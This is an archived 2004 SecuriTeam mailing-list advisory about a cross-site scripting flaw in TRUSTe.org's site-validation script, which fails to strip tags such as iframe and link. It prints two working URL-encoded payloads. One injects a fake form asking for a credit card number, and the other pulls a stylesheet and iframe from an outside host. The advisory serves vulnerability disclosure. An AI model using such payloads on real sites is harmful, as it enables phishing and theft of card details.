Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[NEWS] TRUSTe.org Cross Site Scripting and Phishing Opportunities

from [SecuriTeam] Network Security [Permanent Link]
Subject: [NEWS] TRUSTe.org Cross Site Scripting and Phishing Opportunities
Date: 9 Nov 2004 18:40:55 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  TRUSTe.org Cross Site Scripting and Phishing Opportunities
------------------------------------------------------------------------


SUMMARY

TRUSTe is an independent, nonprofit organization dedicated to enabling 
individuals and organizations to establish trusting relationships based on 
respect for personal identity and information in the evolving networked 
world. Through extensive consumer and Web site research and the support 
and guidance of many established companies and industry experts, TRUSTe 
has earned a reputation as the leader in promoting privacy policy 
disclosure, informed user consent, and consumer education.

One of TRUSTe.org services involves requesting whether a certain web site 
is TRUSTe validated or not. This service has been found to contain a cross 
site scripting vulnerability that opens up the TRUSTe web site to attack 
and allows also to use TRUSTe as a phishing source.

DETAILS

TRUSTe's 'ivalidate.php' is used to validate "trusted" sites. Whilst the 
script does add slashes to quotes and closes <script> and <style> tags, 
there are a number of HTML tags it does not strip, including 
<linK>,<div>,<iframe>. This leaves the site open to attack from phishers 
wanting to make their site appear "trusted".

Examples:
https://www.truste.org/ivalidate.php?url=%3Cfont%20size=5px%3EYou%20are%20not%20verified!%3C/font%3E%3Cbr%3E%3Cbr
 
%3EQuick!%20Send%20us%20some%20money%20to%20fix%20this!%3Cform%20action=http://www.antiphishing.org/%3E%3CBR
 
%3ECREDITCARDNUMBER:%3Cinput%20type=text%3E%3Cinput%20type=submit%3E%3C/form%3E%3Cbr%3E%3Cbr%3ETEH
 
%20FLAP%20Strikes%20once%20again%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr
 
%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3CBR%3E%3CBR
 %3E%3CBR%3E%3CBR%3E

https://www.truste.org/ivalidate.php?url=%3C/b%3E%3C/p%3E%3C/tr%3E%3C/tr%3E%3C/table%3E%3C/center%3E%3C/div%3E
 
%3Clink%20href=http://wheresthebeef.co.uk/XSS/xss.css%20rel=stylesheet%20type=text/css%3E%3Cdiv%20class=pwn%3E
 
%3Ciframe%20src=http://wheresthebeef.co.uk/XSS/xss.htm%20height=1000px%20width=100%25%20FRAMEBORDER=0
 %20SCROLLING=NO%3E%20%3C/iframe%3E%3C/div%3E


ADDITIONAL INFORMATION

The information has been provided by  <mailto:stfunub@gmail.com> Andrew 
Smith.
The original article can be found at:  <http://wheresthebeef.co.uk/XSS/> 
http://wheresthebeef.co.uk/XSS/



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [NEWS] TRUSTe.org Cross Site Scripting and Phishing Opportunities, SecuriTeam <=
Previous by Date:  [UNIX] Samba 3.x.x Wildcard Characters DoS, SecuriTeam
Next by Date:  [EXPL] CCProxy Log Stack Overflow, SecuriTeam
Previous by Thread:  [UNIX] Samba 3.x.x Wildcard Characters DoS, SecuriTeam
Next by Thread:  [EXPL] CCProxy Log Stack Overflow, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]